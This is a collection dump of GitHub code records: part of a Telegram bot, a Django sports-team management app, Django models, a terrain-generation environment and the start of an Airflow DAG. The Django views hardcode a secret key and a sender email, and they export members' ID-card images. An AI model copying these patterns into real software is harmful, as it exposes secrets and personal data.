PlayerInventory.GetPlayerInventory\" in line:\n json_object = line[line.index(\"{\"):]\n player_inventory = json.loads(json_object)\n text = strings.Log.log_result_parsing.format(date.today().strftime(\"%d/%m/%Y\"),\n player_inventory['payload']['vaultProgress'],\n player_inventory['payload']['gems'],\n player_inventory['payload']['gold'])\n context.bot.send_message(chat_id=update.message.chat_id,\n text=emojize(text, use_aliases=True),\n parse_mode=telegram.ParseMode.MARKDOWN,\n reply_to_message_id=update.message.message_id)\n break\n os.remove(filename)\n\n\n@util.send_action(ChatAction.TYPING)\ndef help_pvt(update: Update, context: CallbackContext):\n if update.message.from_user.id in cacheable.get_admin_ids(context.bot):\n button_list = [InlineKeyboardButton(\"user\", callback_data=\"help_user\"),\n InlineKeyboardButton(\"admin\", callback_data=\"help_admin\")]\n reply_markup = InlineKeyboardMarkup(util.build_menu(button_list, n_cols=2))\n text = strings.Help.admin_help\n context.bot.send_message(chat_id=update.message.chat_id,\n text=emojize(text, use_aliases=True),\n parse_mode=telegram.ParseMode.MARKDOWN,\n reply_markup=reply_markup)\n else:\n text = strings.Help.user_help\n context.bot.send_message(chat_id=update.message.chat_id,\n text=emojize(text, use_aliases=True),\n parse_mode=telegram.ParseMode.MARKDOWN)\n\n\ndef help_cb(update: Update, context: CallbackContext):\n query = update.callback_query\n button_list = [InlineKeyboardButton(\"user\", callback_data=\"help_user\"),\n InlineKeyboardButton(\"admin\", callback_data=\"help_admin\")]\n reply_markup = InlineKeyboardMarkup(util.build_menu(button_list, n_cols=2))\n if \"help_user\" in query.data:\n reply = strings.Help.user_help\n pass\n else:\n reply = strings.Help.admin_help\n pass\n try:\n context.bot.edit_message_text(text=reply, chat_id=query.message.chat_id,\n message_id=query.message.message_id, reply_markup=reply_markup,\n parse_mode=telegram.ParseMode.MARKDOWN)\n except telegram.error.BadRequest:\n context.bot.answer_callback_query(callback_query_id=update.callback_query.id)\n","repo_name":"A7F/mtg-telegram-assistant","sub_path":"on_pvt.py","file_name":"on_pvt.py","file_ext":"py","file_size_in_byte":6791,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"40"} +{"seq_id":"12770794749","text":"from django.shortcuts import render\nfrom catalog.models import *\nimport random\nimport time\nfrom django.contrib import auth, messages\nfrom django.contrib.auth.hashers import make_password,check_password\nfrom django.http import HttpResponseRedirect, HttpResponse\nfrom django.urls import reverse\nfrom django.core.mail import send_mail\nfrom django.utils import timezone\nfrom operator import itemgetter, attrgetter\nfrom datetime import datetime, timedelta\nimport pandas as pd\nimport re\nfrom django.core.mail import send_mail\nimport base64\nfrom itsdangerous import URLSafeTimedSerializer as utsr\nimport openpyxl\nfrom openpyxl import Workbook\nimport requests\nimport urllib\nfrom urllib.request import urlretrieve\n\nSECRET_KEY = '))wug4^rwwoiup4#9an29f5pk=uw#d()fkv@_*(a0sf9%rd9tc'\nSECRET_KEY = bytes(SECRET_KEY,encoding = 'utf-8')\n\n#token_confirm = Token(SECRET_KEY)\n\n\nclass Token():\n\tdef __init__(self,security_key):\n\t\tself.security_key = security_key\n\t\tself.salt = base64.encodestring(security_key)\n\tdef generate_validate_token(self,username):\n\t\tserializer = utsr(self.security_key)\n\t\treturn serializer.dumps(username,self.salt)\n\tdef confirm_validate_token(self,token,expiration=3600):\n\t\tserializer = utsr(self.security_key)\n\t\treturn serializer.loads(token,\n\t\tsalt=self.salt,\n\t\tmax_age=expiration) \n\n\n\n# Create your views here.\ndef active(request,token):\n\ttoken_confirm = Token(SECRET_KEY)\n\tusername = token_confirm.confirm_validate_token(token)\n\tplayer = Player.objects.get(username=username)\n\tplayer.is_active = True\n\tplayer.save()\n\treturn HttpResponseRedirect('/index/')\n\ndef hello_view(request):\n return render(request, 'system.html', {\n 'data': \"You've got a star!\",\n })\n\ndef index(request):\n\treturn render(request, 'index.html')\n\ndef register(request):\n\tif request.method == 'GET':\n\t\treturn render(request, 'register.html')\n\tif request.method == 'POST':\n\t\t#generate varify token\n\t\ttoken_confirm = Token(SECRET_KEY)\n\t\tstudent_id = request.POST.get('student_id')\n\t\tpassword = request.POST.get('password')\n\t\tname = request.POST.get('name')\n\t\tsex = request.POST.get('sex')\n\t\tgrade = request.POST.get('grade')\n\t\tif Player.objects.filter(username = student_id).exists():\n\t\t\treturn render(request, 'register.html', {'error_message': 'Already registered student ID'})\n\t\temail = student_id + '@ntu.edu.tw'\n\n\t\tif re.match('(^b|^t|^r|^d)\\d{8}',student_id) == None:\n\t\t\treturn render(request, 'register.html', {'error_message': 'Invalid student_id'})\n\t\tplayer = Player.objects.create_user(student_id, email, password)\n\t\tplayer.name = name\n\t\tplayer.sex = sex\n\t\tplayer.grade = grade\n\t\tplayer.save()\n\n\t\ttoken = token_confirm.generate_validate_token(student_id)\n\t\t#active_key = base64.encodestring(username)\n\t\t#send email to the register email\n\t\t#http://0e2983ec5d6e.ngrok.io \n\t\t#http://localhost:8000\n\t\tmessage = \"\\n\".join([\n\t\tu'{0},歡迎加入資管系隊系統~~'.format(student_id),\n\t\tu'請訪問下方連結,完成使用者驗證:',\n\t\t'/'.join(['http://localhost:8000/active',token])\n\t\t])\n\t\tsend_mail(u'註冊使用者驗證資訊',message,'leo19990709@gmail.com',[email,]) \n\n\t\t#auth.login(request, player)\n\t\treturn HttpResponseRedirect('/index/')\n\n\ndef login(request):\n\tif request.method == 'GET':\n\t\treturn render(request, 'login.html')\n\tif request.method == 'POST':\n\t\tif request.user.is_authenticated:\n\t\t\treturn HttpResponseRedirect('/mainpage/')\n\t\tstudent_id = request.POST.get('student_id')\n\t\tpassword = request.POST.get('password')\n\t\tuser = auth.authenticate(username=student_id, password=password)\n\t\tif user is not None and user.is_active == True:\n\t\t\tauth.login(request, user)\n\t\t\treturn HttpResponseRedirect('/mainpage/')\n\t\telse:\n\t\t\treturn render(request, 'login.html', {'alert_flag': True})\n\ndef logout(request):\n\tauth.logout(request)\n\treturn HttpResponseRedirect('/index/')\n\ndef mainpage(request):\n\tif request.user.is_authenticated:\n\t\tif request.method == 'GET':\n\t\t\tcurrent_user = request.user\n\t\t\tcurrent_playing_sport = Playing_Sport.objects.filter(player = current_user)\n\t\t\tpersonal_photo = current_user.personal_photo\n\t\t\tcurrent_team = []\n\t\t\ttraining_to_see = []\n\t\t\tvoting_to_see = []\n\t\t\tnoticing_to_see = []\n\t\t\tis_captain = False\n\t\t\tfor i in current_playing_sport:\n\t\t\t\tcurrent_team.append(i.sport_name)\n\t\t\tfor i in current_team:\n\t\t\t\ttraining_to_see += Training.objects.filter(sport_name = i, expire_time__gte = timezone.now())\n\t\t\t\tvoting_to_see += Voting.objects.filter(sport_name = i, expire_time__gte = timezone.now())\n\t\t\t\tnoticing_to_see += Noticing.objects.filter(sport_name = i, expire_time__gte = timezone.now())\n\t\t\t\tteam = Team.objects.get(sport_name = i)\n\t\t\t\tif team.captain == current_user:\n\t\t\t\t\tis_captain = True\n\t\t\t\t\tis_captain_team = team.sport_name\n\t\t\ttraining_to_see.sort(key = attrgetter('create_time'))\n\t\t\tvoting_to_see.sort(key = attrgetter('create_time'))\n\t\t\tnoticing_to_see.sort(key = attrgetter('create_time'))\n\t\t\ttraining_to_see.reverse()\n\t\t\tvoting_to_see.reverse()\n\t\t\tnoticing_to_see.reverse()\n\t\t\tif training_to_see:\n\t\t\t\tnext_training = training_to_see[0]\n\t\t\treturn render(request, 'mainpage.html', locals())\n\n\t\tif request.method == 'POST':\n\t\t\tif request.POST.get('submit'):\n\t\t\t\tsubmit_type = request.POST.get('submit')\n\t\t\t\tif submit_type == 'noticing':\n\t\t\t\t\tcurrent_user = request.user\n\t\t\t\t\tposter = current_user\n\t\t\t\t\tsport_name = request.POST.get('sport_name')\n\t\t\t\t\tsport_input = Team.objects.filter(sport_name = sport_name)\n\t\t\t\t\texpire_time = request.POST.get('expire_time')\n\t\t\t\t\tparagraph = request.POST.get('paragraph')\n\t\t\t\t\tNoticing.objects.create(poster = poster, sport_name = sport_input[0], expire_time = expire_time, paragraph = paragraph)\n\t\t\t\telif submit_type == 'training':\n\t\t\t\t\tcurrent_user = request.user\n\t\t\t\t\tposter = current_user\n\t\t\t\t\tsport_name = request.POST.get('sport_name')\n\t\t\t\t\tsport_input = Team.objects.filter(sport_name = sport_name)\n\t\t\t\t\ttime = request.POST.get('time')\n\t\t\t\t\tend_time = request.POST.get('end_time')\n\t\t\t\t\tcourt = request.POST.get('court')\n\t\t\t\t\tTraining.objects.create(poster = poster, sport_name = sport_input[0], time = time, end_time = end_time, expire_time = time, court = court)\n\t\t\t\telif submit_type == 'participate_train':\n\t\t\t\t\tcurrent_user = request.user\n\t\t\t\t\tnum = request.POST.get('number')\n\t\t\t\t\tcurrent_training = Training.objects.get(id = num)\n\t\t\t\t\tcurrent_playing_sport = Playing_Sport.objects.get(player = current_user, sport_name = current_training.sport_name)\n\t\t\t\t\t\n\t\t\t\t\tif current_playing_sport in current_training.participant.all():\n\t\t\t\t\t\tpass\n\t\t\t\t\telse:\n\t\t\t\t\t\tif current_playing_sport.sport_name.sport_name == '羽球':\n\t\t\t\t\t\t\tcurrent_playing_sport.points_left -= 1\n\t\t\t\t\t\t#print(current_playing_sport.points_received + 1)\n\t\t\t\t\t\tcurrent_playing_sport.points_received += 1\n\t\t\t\t\t\t#print(current_playing_sport.points_received)\n\t\t\t\t\t\tcurrent_playing_sport.save()\n\t\t\t\t\t\tcurrent_training.participant.add(current_playing_sport)\n\t\t\t\t\t\tcurrent_training.save()\t\t\t\t\t\t\t\t\t\n\t\t\t\telif submit_type == 'cancel_train':\n\t\t\t\t\tcurrent_user = request.user\n\t\t\t\t\tnum = request.POST.get('number')\n\t\t\t\t\tcurrent_training = Training.objects.get(id = num)\n\t\t\t\t\tcurrent_playing_sport = Playing_Sport.objects.get(player = current_user, sport_name = current_training.sport_name)\n\t\t\t\t\tif current_playing_sport not in current_training.participant.all():\n\t\t\t\t\t\tpass\n\t\t\t\t\telse:\n\t\t\t\t\t\tif current_playing_sport.sport_name.sport_name == '羽球':\n\t\t\t\t\t\t\tcurrent_playing_sport.points_left += 1\n\t\t\t\t\t\tcurrent_playing_sport.points_received -= 1\n\t\t\t\t\t\tcurrent_playing_sport.save()\n\t\t\t\t\t\tcurrent_training.participant.remove(current_playing_sport)\n\t\t\t\t\t\tcurrent_training.save()\t\n\t\t\t\telif submit_type == 'voting':\n\t\t\t\t\tcurrent_user = request.user\n\t\t\t\t\tposter = current_user\n\t\t\t\t\tsport_name = request.POST.get('sport_name')\n\t\t\t\t\tsport_input = Team.objects.get(sport_name = sport_name)\n\t\t\t\t\tend_time = request.POST.get('end_time')\n\t\t\t\t\texpire_time = request.POST.get('expire_time')\n\t\t\t\t\tquestion = request.POST.get('question')\n\t\t\t\t\toption_one = request.POST.get('option_one')\n\t\t\t\t\toption_two = request.POST.get('option_two')\n\t\t\t\t\tif request.POST.get('option_three'):\n\t\t\t\t\t\toption_three = request.POST.get('option_three')\n\t\t\t\t\t\tVoting.objects.create(poster = poster, sport_name = sport_input, end_time = end_time, expire_time = expire_time, question = question, option_one = option_one, option_two = option_two, option_three = option_three)\n\t\t\t\t\telse:\n\t\t\t\t\t\tVoting.objects.create(poster = poster, sport_name = sport_input, end_time = end_time, expire_time = expire_time, question = question, option_one = option_one, option_two = option_two)\n\t\t\t\telif submit_type == 'govote':\n\t\t\t\t\tcurrent_user = request.user\n\t\t\t\t\tnum = request.POST.get('number')\n\t\t\t\t\tcurrent_voting = Voting.objects.get(id = num)\n\t\t\t\t\tcurrent_playing_sport = Playing_Sport.objects.get(player = current_user, sport_name = current_voting.sport_name)\n\t\t\t\t\tif current_playing_sport in current_voting.participant.all():\n\t\t\t\t\t\tpass\n\t\t\t\t\telse:\n\t\t\t\t\t\tcurrent_user_weighted = current_playing_sport.points_received // 5 + 1\n\t\t\t\t\t\tif request.POST.get('answer'):\n\t\t\t\t\t\t\tcurrent_voting.participant.add(current_playing_sport)\n\t\t\t\t\t\t\tanswer = request.POST.get('answer')\n\t\t\t\t\t\t\tif answer == 'one':\n\t\t\t\t\t\t\t\tcurrent_voting.option_one_cnt += current_user_weighted\n\t\t\t\t\t\t\telif answer == 'two':\n\t\t\t\t\t\t\t\tcurrent_voting.option_two_cnt += current_user_weighted\n\t\t\t\t\t\t\telif answer =='three':\n\t\t\t\t\t\t\t\tcurrent_voting.option_three_cnt += current_user_weighted\n\t\t\t\t\t\t\tcurrent_voting.save()\t\t\t\t\t\t\n\t\t\t\treturn HttpResponseRedirect('/mainpage/')\n\telse:\n\t\treturn HttpResponseRedirect('/login/')\n\ndef settings(request):\n\tif request.user.is_authenticated:\n\t\tif request.method == 'GET':\n\t\t\treturn render(request, 'settings.html', locals())\n\t\tif request.method == 'POST':\n\t\t\tcurrent_user = request.user\n\t\t\tif request.POST.get('password'):\n\t\t\t\tpassword = request.POST.get('password')\n\t\t\t\tuser = auth.authenticate(username=current_user.username, password=password)\n\t\t\t\tif user is not None and user.is_active == True:\n\t\t\t\t\tif request.POST.get('name'):\n\t\t\t\t\t\tnew_name = request.POST.get('name')\n\t\t\t\t\t\tcurrent_user.name = new_name\n\t\t\t\t\t\tcurrent_user.save()\n\t\t\t\t\tif request.POST.get('telephone'):\n\t\t\t\t\t\tnew_telephone = request.POST.get('telephone')\n\t\t\t\t\t\tcurrent_user.telephone = new_telephone\n\t\t\t\t\t\tcurrent_user.save()\n\t\t\t\t\tif request.FILES.get('personal_photo'):\n\t\t\t\t\t\tnew_personal_photo = request.FILES.get('personal_photo')\n\t\t\t\t\t\tcurrent_user.personal_photo = new_personal_photo\n\t\t\t\t\t\tcurrent_user.save()\n\t\t\t\t\tif request.FILES.get('student_card_front'):\n\t\t\t\t\t\tnew_student_card_front = request.FILES.get('student_card_front')\n\t\t\t\t\t\tcurrent_user.student_card_front = new_student_card_front\n\t\t\t\t\t\tcurrent_user.save()\n\t\t\t\t\tif request.FILES.get('student_card_back'):\n\t\t\t\t\t\tnew_student_card_back = request.FILES.get('student_card_back')\n\t\t\t\t\t\tcurrent_user.student_card_back = new_student_card_back\n\t\t\t\t\t\tcurrent_user.save()\n\t\t\t\t\tif request.FILES.get('ID_card'):\n\t\t\t\t\t\tnew_ID_card = request.FILES.get('ID_card')\n\t\t\t\t\t\tcurrent_user.ID_card = new_ID_card\n\t\t\t\t\t\tcurrent_user.save()\n\t\t\t\t\tif request.FILES.get('proof'):\n\t\t\t\t\t\tnew_proof = request.FILES.get('proof')\n\t\t\t\t\t\tcurrent_user.proof = new_proof\n\t\t\t\t\t\tcurrent_user.save()\n\t\t\t\telse:\n\t\t\t\t\talert_flag = True\n\t\t\t\t\treturn render(request, 'settings.html', locals())\n\n\t\treturn HttpResponseRedirect('/mainpage/')\n\telse:\n\t\treturn HttpResponseRedirect('/login/')\n\ndef applyteam(request):\n\tif request.user.is_authenticated:\n\t\tif request.method == 'GET':\n\t\t\tteam = Team.objects.all()\n\t\t\treturn render(request, 'apply_team.html', locals())\n\t\tif request.method == 'POST':\n\t\t\tcurrent_user = request.user\n\t\t\tif request.POST.get('password'):\n\t\t\t\tpassword = request.POST.get('password')\n\t\t\t\tuser = auth.authenticate(username=current_user.username, password=password)\n\t\t\t\tif user is not None and user.is_active == True:\n\t\t\t\t\tapplying_team = request.POST.get('team')\n\t\t\t\t\ttarget_team = Team.objects.get(sport_name = applying_team)\n\t\t\t\t\tif target_team.sport_name == '羽球':\n\t\t\t\t\t\tPlaying_Sport.objects.create(player = current_user, sport_name = target_team, points_left = 10)\n\t\t\t\t\telse:\n\t\t\t\t\t\tPlaying_Sport.objects.create(player = current_user, sport_name = target_team, points_left = 0)\n\t\t\t\telse:\n\t\t\t\t\talert_flag = True\n\t\t\t\t\tteam = Team.objects.all()\n\t\t\t\t\treturn render(request, 'apply_team.html', locals())\n\n\t\treturn HttpResponseRedirect('/mainpage/')\n\telse:\n\t\treturn HttpResponseRedirect('/login/')\n\ndef manageteam(request):\n\tif request.user.is_authenticated:\n\t\tif request.method == 'GET':\n\t\t\tcurrent_user = request.user\n\t\t\tcurrent_playing_sport = Playing_Sport.objects.filter(player = current_user)\n\t\t\tcurrent_team = []\n\t\t\tis_captain = False\n\t\t\tfor i in current_playing_sport:\n\t\t\t\tcurrent_team.append(i.sport_name)\n\t\t\tfor i in current_team:\n\t\t\t\tteam = Team.objects.get(sport_name = i)\n\t\t\t\tif team.captain == current_user:\n\t\t\t\t\tis_captain = True\n\t\t\t\t\tbreak\n\t\t\tif is_captain == False:\n\t\t\t\treturn HttpResponseRedirect('/mainpage/')\n\t\t\tteam_availible_time = Availible_Day_Sport.objects.get(sport_name = team)\n\t\t\tteam_member = Playing_Sport.objects.filter(sport_name = team)\n\t\t\treturn render(request, 'manageteam.html', locals())\n\t\tif request.method == 'POST':\n\t\t\tcurrent_user = request.user\n\t\t\tcurrent_playing_sport = Playing_Sport.objects.filter(player = current_user)\n\t\t\tcurrent_team = []\n\t\t\tis_captain = False\n\t\t\tfor i in current_playing_sport:\n\t\t\t\tcurrent_team.append(i.sport_name)\n\t\t\tfor i in current_team:\n\t\t\t\tteam = Team.objects.get(sport_name = i)\n\t\t\t\tif team.captain == current_user:\n\t\t\t\t\tis_captain = True\n\t\t\t\t\tbreak\n\t\t\tif request.POST.get('submit'):\n\t\t\t\tsubmit_type = request.POST.get('submit')\n\t\t\t\tif request.POST.get('password'):\n\t\t\t\t\tpassword = request.POST.get('password')\n\t\t\t\t\tuser = auth.authenticate(username=current_user.username, password=password)\n\t\t\t\t\tif user is not None and user.is_active == True:\n\t\t\t\t\t\tif submit_type == 'get_team':\n\t\t\t\t\t\t\tmember = request.POST.getlist('members')\n\t\t\t\t\t\t\toutput_list = []\n\t\t\t\t\t\t\tfor i in member:\n\t\t\t\t\t\t\t\ttarget = Player.objects.filter(name = i)\n\t\t\t\t\t\t\t\toutput_list += target.values('name', 'username', 'sex', 'grade', 'telephone', 'personal_photo', 'student_card_front', 'student_card_back', 'ID_card', 'proof')\n\t\t\t\t\t\t\toutput = pd.DataFrame.from_records(output_list)\n\t\t\t\t\t\t\tResult_PATH = 'team_member.xlsx'\n\t\t\t\t\t\t\twriter = pd.ExcelWriter(Result_PATH, engine='xlsxwriter')\n\t\t\t\t\t\t\toutput.to_excel(writer, sheet_name = 'mem_list')\n\t\t\t\t\t\t\twriter.save()\n\t\t\t\t\t\t\t#def down_file(request):\n\t\t\t\t\t\t\twith open('team_member.xlsx', 'rb') as model_excel:\n\t\t\t\t\t\t\t\tresult = model_excel.read()\n\t\t\t\t\t\t\tresponse = HttpResponse(result)\n\t\t\t\t\t\t\tresponse['Content-Disposition'] = 'attachment; filename=team_member_list.xlsx'\n\t\t\t\t\t\t\treturn response\n\t\t\t\t\t\t\t#xlsx_url = 'http://localhost:8000/media/team_member.xlsx'\n\t\t\t\t\t\t\t#urlretrieve(xlsx_url, \"test.xlsx\")\n\t\t\t\t\t\t\tprint(output.head())\n\t\t\t\t\t\t\t#output.to_excel('member_list.xlsx')\n\t\t\t\t\t\telif submit_type == 'change_captain':\n\t\t\t\t\t\t\tnext_captain_name = request.POST.get('captain')\n\t\t\t\t\t\t\tnext_captain = Player.objects.get(name = next_captain_name)\n\t\t\t\t\t\t\tteam.captain = next_captain\n\t\t\t\t\t\t\tteam.save()\n\t\t\t\t\telse:\n\t\t\t\t\t\talert_flag = True\n\t\t\t\t\t\treturn render(request, 'manageteam.html', locals())\n\t\t\treturn HttpResponseRedirect('/mainpage/')\n\telse:\n\t\treturn HttpResponseRedirect('/login/')\n\ndef myinfo(request):\n\tif request.user.is_authenticated:\n\t\tif request.method == 'GET':\n\t\t\tcurrent_user = request.user\n\t\t\tcurrent_playing_sport = Playing_Sport.objects.filter(player = current_user)\n\t\t\treturn render(request, 'myinfo.html', locals())\n\t\tif request.method == 'POST':\n\t\t\tcurrent_user = request.user\n\t\t\tsubmit_type = request.POST.get('submit')\n\t\t\tif submit_type == 'submit_day':\n\t\t\t\tcurrent_playing_sport = Playing_Sport.objects.filter(player = current_user)\n\t\t\t\tcurrent_team = []\n\t\t\t\tfor i in current_playing_sport:\n\t\t\t\t\tcurrent_team.append(i.sport_name)\n\t\t\t\tcurrent_team_availible = []\n\t\t\t\tfor i in current_team:\n\t\t\t\t\tcurrent_team_availible += Availible_Day_Sport.objects.filter(sport_name = i)\n\t\t\t\tif current_user in current_team_availible[0].participant.all():\n\t\t\t\t\tfor i in current_playing_sport:\n\t\t\t\t\t\tcurrent_player_availible = Availible_Day_Player.objects.get(player = i.player, sport_name = i.sport_name)\n\t\t\t\t\t\tadd_team_availible = Availible_Day_Sport.objects.get(sport_name = i.sport_name)\n\t\t\t\t\t\tif current_player_availible.monday == True:\n\t\t\t\t\t\t\tadd_team_availible.monday -= current_player_availible.priority\n\t\t\t\t\t\tif current_player_availible.tuesday == True:\n\t\t\t\t\t\t\tadd_team_availible.tuesday -= current_player_availible.priority\n\t\t\t\t\t\tif current_player_availible.wednesday == True:\n\t\t\t\t\t\t\tadd_team_availible.wednesday -= current_player_availible.priority\n\t\t\t\t\t\tif current_player_availible.thursday == True:\n\t\t\t\t\t\t\tadd_team_availible.thursday -= current_player_availible.priority\n\t\t\t\t\t\tif current_player_availible.friday == True:\n\t\t\t\t\t\t\tadd_team_availible.friday -= current_player_availible.priority\n\t\t\t\t\t\tadd_team_availible.participant.remove(current_user)\n\t\t\t\t\t\tadd_team_availible.save()\n\t\t\t\t\t\tcurrent_player_availible.monday = False\n\t\t\t\t\t\tcurrent_player_availible.tuesday = False\n\t\t\t\t\t\tcurrent_player_availible.wednesday = False\n\t\t\t\t\t\tcurrent_player_availible.thursday = False\n\t\t\t\t\t\tcurrent_player_availible.friday = False\n\t\t\t\t\t\tcurrent_player_availible.priority = 0\n\t\t\t\t\t\tcurrent_player_availible.save()\n\t\t\t\t\t#print(add_team_availible.monday, add_team_availible.tuesday, add_team_availible.wednesday, add_team_availible.thursday, add_team_availible.friday)\n\t\t\t\t\tmonday = tuesday = wednesday = thursday = friday = False\n\t\t\t\t\tavailible_time = request.POST.getlist('availible_time')\t\t\t\t\t\n\t\t\t\t\tif 'monday' in availible_time:\n\t\t\t\t\t\tmonday = True\n\t\t\t\t\tif 'tuesday' in availible_time:\n\t\t\t\t\t\ttuesday = True\n\t\t\t\t\tif 'wednesday' in availible_time:\n\t\t\t\t\t\twednesday = True\n\t\t\t\t\tif 'thursday' in availible_time:\n\t\t\t\t\t\tthursday = True\n\t\t\t\t\tif 'friday' in availible_time:\n\t\t\t\t\t\tfriday = True\n\t\t\t\t\tfor i in current_playing_sport:\n\t\t\t\t\t\tpriority = i.points_received // 5 + 1\n\t\t\t\t\t\tcurrent_player_availible = Availible_Day_Player.objects.get(player = i.player, sport_name = i.sport_name)\n\t\t\t\t\t\tcurrent_player_availible.priority = priority\n\t\t\t\t\t\tadd_team_availible = Availible_Day_Sport.objects.get(sport_name = i.sport_name)\n\t\t\t\t\t\tif monday == True:\n\t\t\t\t\t\t\tcurrent_player_availible.monday = True\n\t\t\t\t\t\t\tadd_team_availible.monday += priority\n\t\t\t\t\t\tif tuesday == True:\n\t\t\t\t\t\t\tcurrent_player_availible.tuesday = True\n\t\t\t\t\t\t\tadd_team_availible.tuesday += priority\n\t\t\t\t\t\tif wednesday == True:\n\t\t\t\t\t\t\tcurrent_player_availible.wednesday = True\n\t\t\t\t\t\t\tadd_team_availible.wednesday += priority\n\t\t\t\t\t\tif thursday == True:\n\t\t\t\t\t\t\tcurrent_player_availible.thursday = True\n\t\t\t\t\t\t\tadd_team_availible.thursday += priority\n\t\t\t\t\t\tif friday == True:\n\t\t\t\t\t\t\tcurrent_player_availible.friday = True\n\t\t\t\t\t\t\tadd_team_availible.friday += priority\n\t\t\t\t\t\tcurrent_player_availible.save()\n\t\t\t\t\t\tadd_team_availible.participant.add(current_user)\n\t\t\t\t\t\tadd_team_availible.save()\n\t\t\t\t\t#print(add_team_availible.monday, add_team_availible.tuesday, add_team_availible.wednesday, add_team_availible.thursday, add_team_availible.friday)\n\t\t\t\telse:\t\t\t\t\t\n\t\t\t\t\tmonday = tuesday = wednesday = thursday = friday = False\n\t\t\t\t\tavailible_time = request.POST.getlist('availible_time')\t\t\t\t\t\n\t\t\t\t\tif 'monday' in availible_time:\n\t\t\t\t\t\tmonday = True\n\t\t\t\t\tif 'tuesday' in availible_time:\n\t\t\t\t\t\ttuesday = True\n\t\t\t\t\tif 'wednesday' in availible_time:\n\t\t\t\t\t\twednesday = True\n\t\t\t\t\tif 'thursday' in availible_time:\n\t\t\t\t\t\tthursday = True\n\t\t\t\t\tif 'friday' in availible_time:\n\t\t\t\t\t\tfriday = True\n\t\t\t\t\tfor i in current_playing_sport:\n\t\t\t\t\t\tpriority = i.points_received // 5 + 1\n\t\t\t\t\t\tAvailible_Day_Player.objects.create(player = current_user, sport_name = i.sport_name, monday = monday, tuesday = tuesday, wednesday = wednesday, thursday = thursday, friday = friday, priority = priority)\n\t\t\t\t\t\tadd_team_availible = Availible_Day_Sport.objects.get(sport_name = i.sport_name)\n\t\t\t\t\t\tif monday == True:\n\t\t\t\t\t\t\tadd_team_availible.monday += priority\n\t\t\t\t\t\tif tuesday == True:\n\t\t\t\t\t\t\tadd_team_availible.tuesday += priority\n\t\t\t\t\t\tif wednesday == True:\n\t\t\t\t\t\t\tadd_team_availible.wednesday += priority\n\t\t\t\t\t\tif thursday == True:\n\t\t\t\t\t\t\tadd_team_availible.thursday += priority\n\t\t\t\t\t\tif friday == True:\n\t\t\t\t\t\t\tadd_team_availible.friday += priority\n\t\t\t\t\t\tadd_team_availible.participant.add(current_user)\n\t\t\t\t\t\tadd_team_availible.save()\n\n\n\t\treturn HttpResponseRedirect('/mainpage/')\n\telse:\n\t\treturn HttpResponseRedirect('/login/')","repo_name":"COYADI/System-Analysis","sub_path":"sports_team_system/catalog/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":20329,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"12954045556","text":"from django.contrib.auth import get_user_model\nfrom django.db import models\n\nUser = get_user_model()\n\n\nclass Group(models.Model):\n title = models.CharField(max_length=200, verbose_name='Заголовок')\n slug = models.SlugField(\n unique=True,\n verbose_name='Идентификатор')\n description = models.TextField(\n max_length=200,\n blank=True,\n verbose_name='Описание')\n\n class Meta:\n verbose_name = 'Группа'\n verbose_name_plural = 'Группы'\n\n def __str__(self):\n return self.title\n\n\nclass Post(models.Model):\n text = models.TextField(verbose_name='Текст')\n pub_date = models.DateTimeField(auto_now_add=True, verbose_name='Дата')\n author = models.ForeignKey(\n User,\n on_delete=models.CASCADE,\n related_name='posts',\n verbose_name='Автор')\n group = models.ForeignKey(\n Group,\n on_delete=models.SET_NULL,\n related_name='posts',\n blank=True, null=True,\n verbose_name='Группа')\n image = models.ImageField(\n 'Картинка',\n upload_to='posts/',\n blank=True\n )\n\n def __str__(self):\n return self.text[:15]\n\n class Meta:\n ordering = ('-pub_date',)\n verbose_name = 'Пост'\n verbose_name_plural = 'Посты'\n","repo_name":"maksyanya/hw04_tests","sub_path":"yatube/posts/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1363,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"26636590742","text":"from builtins import range\r\nimport time\r\nfrom PerlinNoiseFactory import PerlinNoiseFactory\r\nimport numpy as np\r\nimport math\r\nimport random\r\n\r\n\r\nclass XMLenv:\r\n def __init__(self, max_episode_steps, size=201, obs_size=5, flat_word=False, debug=False):\r\n self.size = size\r\n self.debug = debug\r\n self.obs_size = obs_size\r\n self.flat_world = flat_word\r\n self.terrain_array = self.getTerrain()\r\n self.center = self.size//2\r\n self.max_episode_steps = max_episode_steps\r\n i = math.floor(random.random()*size)\r\n j = math.floor(random.random()*size)\r\n\r\n # coordinate in the form of (x, y, z)\r\n # FLOOR AGENTS X AND Z COORDINATES TO CHECK IF ITS AT THE END COORDINATE (floor -)\r\n self.end_coordinate = (\r\n i-self.center, self.terrain_array[j + self.obs_size, i + self.obs_size]+1, j-self.center)\r\n self.goal = np.array(\r\n [self.end_coordinate[0], self.end_coordinate[2]])\r\n self.start_coordinate = (\r\n 0, 0)\r\n\r\n def getGoal(self):\r\n return self.goal\r\n\r\n def getTerrain(self):\r\n if self.flat_world:\r\n a = np.array([[5 for j in range(self.size)]\r\n for i in range(self.size)])\r\n else:\r\n p = PerlinNoiseFactory(2, 4)\r\n a = np.array([[p(i/self.size, j/self.size)\r\n for j in range(self.size)] for i in range(self.size)])\r\n a = np.abs((a*50).astype(int)) + 5\r\n\r\n a = np.pad(a, self.obs_size, constant_values=80)\r\n if self.debug:\r\n print(\"Terrain Map:\", a)\r\n return a\r\n\r\n def inGoal(self, position):\r\n return (position[0] == self.goal[0]) and (position[1] == self.goal[1])\r\n\r\n def isEnd(self, position, steps):\r\n return self.inGoal(position) or steps >= self.max_episode_steps\r\n","repo_name":"sky121/Moogle-Maps","sub_path":"training/XMLenv.py","file_name":"XMLenv.py","file_ext":"py","file_size_in_byte":1868,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"74566440121","text":"from datetime import datetime\r\nimport os\r\nimport requests\r\n\r\nfrom airflow.decorators import dag\r\nfrom airflow.providers.google.cloud.operators.bigquery import BigQueryCreateEmptyDatasetOperator, BigQueryCreateEmptyTableOperator, BigQueryInsertJobOperator\r\nfrom airflow.operators.python import PythonOperator\r\n\r\n\r\nAPI = \"https://api.coingecko.com/api/v3/simple/price?ids=bitcoin&vs_currencies=usd&include_market_cap=true&include_24hr_vol=true&include_24hr_change=true&include_last_updated_at=true\"\r\nDATASET = 